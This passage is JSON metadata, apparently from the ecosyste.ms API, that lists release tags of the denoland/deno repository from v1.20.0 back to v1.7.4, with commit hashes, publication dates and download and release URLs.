0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","sha":"57927781ed7eb8bb088d656768dc295716407c7a","kind":"commit","published_at":"2021-05-12T00:06:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.0/manifests"},{"name":"v1.9.2","sha":"8074d8bcf3cdcc7e9a08df147e0082798a7c2760","kind":"commit","published_at":"2021-04-23T14:08:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.2/manifests"},{"name":"v1.9.1","sha":"7760d9a669552e69211b101d4656662a3dddf8dd","kind":"commit","published_at":"2021-04-20T23:46:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.1/manifests"},{"name":"v1.9.0","sha":"262ee78592209a1f8e449cfa1308dca9688a414e","kind":"commit","published_at":"2021-04-13T18:11:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.9.0/manifests"},{"name":"v1.8.3","sha":"2e6b78be9095cc38c392e2477711ff6eec226704","kind":"commit","published_at":"2021-04-02T10:10:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.3/manifests"},{"name":"v1.8.2","sha":"f50ed4e281e6c30120412271eb66a1fb67d1c63e","kind":"commit","published_at":"2021-03-21T20:12:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.2/manifests"},{"name":"v1.8.1","sha":"8d3baa7777b6bd2a2631e1b87a4676b520f2b447","kind":"commit","published_at":"2021-03-09T20:55:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.1/manifests"},{"name":"v1.8.0","sha":"18b894072d3eb6b04016e77ece0d78512f7ffca1","kind":"commit","published_at":"2021-03-02T23:23:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.8.0/manifests"},{"name":"v1.7.5","sha":"e9669bf0656c2478416f6705ff218539dc42c126","kind":"commit","published_at":"2021-02-19T14:58:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.5/manifests"},{"name":"v1.7.4","sha":"d2d7d